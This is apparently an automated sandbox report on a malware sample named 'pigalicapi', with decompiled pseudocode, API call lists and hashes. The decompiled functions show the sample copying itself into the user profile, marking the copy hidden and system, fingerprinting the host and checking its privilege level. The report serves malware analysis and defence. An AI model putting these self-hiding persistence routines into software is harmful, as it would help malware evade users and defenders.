                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                                          • Instruction ID: 8bdf0d2272c993105e18f632bfcb20d3462f1ee8570acd5c3bdc395bff94e74a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A910D74A04208AFEB14DFA4D849BDDBBB5FB48705F108219FA05BB2C0D778A984CF55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E04005700(CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                                          				long _v560;
                                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                                          				long _v568;
                                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					E04008F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                                                          					E04001CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                                          					E04009D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                                          					E04007B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                                          					_t59 = E04005CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                                          					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                                          					E04007D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                                          					_v28 = 0x207;
                                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207); // executed
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                                          					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                          					_v32 = _t67;
                                                                                                                                                                                                                                                                                          					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                                          						if(_v560 > 0) {
                                                                                                                                                                                                                                                                                          							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          							_v564 = _t71;
                                                                                                                                                                                                                                                                                          							if(_v564 != 0) {
                                                                                                                                                                                                                                                                                          								_v568 = 0;
                                                                                                                                                                                                                                                                                          								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                                          								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                                          									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                                          									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x04005709
                                                                                                                                                                                                                                                                                          0x04005711
                                                                                                                                                                                                                                                                                          0x04005729
                                                                                                                                                                                                                                                                                          0x04005742
                                                                                                                                                                                                                                                                                          0x04005756
                                                                                                                                                                                                                                                                                          0x0400576e
                                                                                                                                                                                                                                                                                          0x04005786
                                                                                                                                                                                                                                                                                          0x04005798
                                                                                                                                                                                                                                                                                          0x040057a3
                                                                                                                                                                                                                                                                                          0x040057b8
                                                                                                                                                                                                                                                                                          0x040057cc
                                                                                                                                                                                                                                                                                          0x040057d4
                                                                                                                                                                                                                                                                                          0x040057e4
                                                                                                                                                                                                                                                                                          0x0400580a
                                                                                                                                                                                                                                                                                          0x040057e6
                                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                                          0x0400582f
                                                                                                                                                                                                                                                                                          0x04005854
                                                                                                                                                                                                                                                                                          0x0400585a
                                                                                                                                                                                                                                                                                          0x04005861
                                                                                                                                                                                                                                                                                          0x04005873
                                                                                                                                                                                                                                                                                          0x04005880
                                                                                                                                                                                                                                                                                          0x04005896
                                                                                                                                                                                                                                                                                          0x0400589c
                                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                                          0x040058ab
                                                                                                                                                                                                                                                                                          0x040058d0
                                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                                          0x04005912
                                                                                                                                                                                                                                                                                          0x040058e4
                                                                                                                                                                                                                                                                                          0x040058ed
                                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                                          0x0400592c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 0400580A
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005896
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040058D0
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04005912
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400591C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$CloseVirtuallstrlen$ChangeCreateFindNotificationProcess$AllocDirectoryFirstFreeModuleNameProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromHandleInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                                          • API String ID: 1116761331-4090404022
                                                                                                                                                                                                                                                                                          • Opcode ID: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                                          • Instruction ID: 5a1df65dd39d11d2feffdc598e8508d5089156913625d6b4e9fa29ff03a3d0d3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66515FB4944208BBFB14DF60DC59FEA7774EB44709F048168FA097A2C1D778AA81CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 592 4001120-4001134 593 400113a-400113e 592->593 594 40012bb-40012c1 592->594 593->594 595 4001144-4001150 lstrlenA 593->595 595->594 596 4001156-4001162 lstrlenA 595->596 596->594 597 4001168-4001175 596->597 598 4001177-4001188 GetAllUsersProfileDirectoryA 597->598 599 400118a-400119b GetEnvironmentVariableA 597->599 600 40011a1-40011d9 wnsprintfA lstrcmpiA 598->600 599->600 601 4001216-4001287 call 40097a0 lstrcpyA * 2 CreateThread 600->601 602 40011db-40011e1 600->602 606 40012a3-40012b8 call 40097c0 601->606 607 4001289-400128d 601->607 602->601 603 40011e3-4001210 CopyFileA SetFileAttributesA lstrcpyA 602->603 603->601 606->594 608 400129a-40012a1 607->608 609 400128f-4001298 607->609 608->594 609->608
                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E04001120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                                          				void* _v288;
                                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                                          				void* _v560;
                                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0x104;
                                                                                                                                                                                                                                                                                          					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                                                          					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						CopyFileA(_a4,  &_v556, 0);
                                                                                                                                                                                                                                                                                          						SetFileAttributesA( &_v556, 6);
                                                                                                                                                                                                                                                                                          						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v560 = E040097A0(0x30d);
                                                                                                                                                                                                                                                                                          					_v16 = _v560;
                                                                                                                                                                                                                                                                                          					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                                          					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                                          					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                                          					_t58 = CreateThread(0, 0, E040012D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                                          					_v288 = _t58;
                                                                                                                                                                                                                                                                                          					if(_v288 == 0) {
                                                                                                                                                                                                                                                                                          						_v564 = _v16;
                                                                                                                                                                                                                                                                                          						E040097C0(_v564);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_a20 != 0) {
                                                                                                                                                                                                                                                                                          							 *_a20 = _v288;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x04001129
                                                                                                                                                                                                                                                                                          0x04001134
                                                                                                                                                                                                                                                                                          0x04001168
                                                                                                                                                                                                                                                                                          0x04001175
                                                                                                                                                                                                                                                                                          0x0400119b
                                                                                                                                                                                                                                                                                          0x04001177
                                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                                          0x040011bd
                                                                                                                                                                                                                                                                                          0x040011d9
                                                                                                                                                                                                                                                                                          0x040011f0
                                                                                                                                                                                                                                                                                          0x040011ff
                                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                                          0x04001223
                                                                                                                                                                                                                                                                                          0x0400122f
                                                                                                                                                                                                                                                                                          0x04001238
                                                                                                                                                                                                                                                                                          0x04001249
                                                                                                                                                                                                                                                                                          0x0400125d
                                                                                                                                                                                                                                                                                          0x04001274
                                                                                                                                                                                                                                                                                          0x0400127a
                                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                                          0x040012a6
                                                                                                                                                                                                                                                                                          0x040012b3
                                                                                                                                                                                                                                                                                          0x04001289
                                                                                                                                                                                                                                                                                          0x0400128d
                                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                                          0x040012c1

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
                                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: RtlFreeHeap.NTDLL(00000000), ref: 040097D6
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 0400119B
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                                                          • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                                                          • Opcode ID: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                                          • Instruction ID: 5a94151192094d4d6073c3e413aca9132142fa07401a96dcdce05a8263d9ef35
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A413675904208ABEB54CFA4D889BDE77B4EF48704F00C295F509AA281D779EA84CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                                                                                                                          			E040099F0() {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				char _v1044;
                                                                                                                                                                                                                                                                                          				char _v2068;
                                                                                                                                                                                                                                                                                          				long _v2072;
                                                                                                                                                                                                                                                                                          				void* _v2076;
                                                                                                                                                                                                                                                                                          				void* _v2080;
                                                                                                                                                                                                                                                                                          				char _v2084;
                                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0x400;
                                                                                                                                                                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					return _v9;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v2072 = 0;
                                                                                                                                                                                                                                                                                          				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                                          				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                                          					CloseHandle(_v16);
                                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                                          				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                                          				if(_t43 == 0) {
                                                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                                          				_v2084 = 0x44;
                                                                                                                                                                                                                                                                                          				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                          				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                          					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                          					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                          						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                          						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                          							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                          							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x040099f9
                                                                                                                                                                                                                                                                                          0x040099fd
                                                                                                                                                                                                                                                                                          0x04009a19
                                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                                          0x04009a1f
                                                                                                                                                                                                                                                                                          0x04009a3a
                                                                                                                                                                                                                                                                                          0x04009a4a
                                                                                                                                                                                                                                                                                          0x04009b76
                                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                                          0x04009a56
                                                                                                                                                                                                                                                                                          0x04009a77
                                                                                                                                                                                                                                                                                          0x04009a7f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009a8b
                                                                                                                                                                                                                                                                                          0x04009a91
                                                                                                                                                                                                                                                                                          0x04009aad
                                                                                                                                                                                                                                                                                          0x04009acb
                                                                                                                                                                                                                                                                                          0x04009ae6
                                                                                                                                                                                                                                                                                          0x04009b04
                                                                                                                                                                                                                                                                                          0x04009b1c
                                                                                                                                                                                                                                                                                          0x04009b3a
                                                                                                                                                                                                                                                                                          0x04009b52
                                                                                                                                                                                                                                                                                          0x04009b70
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b72
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b3c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b06
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
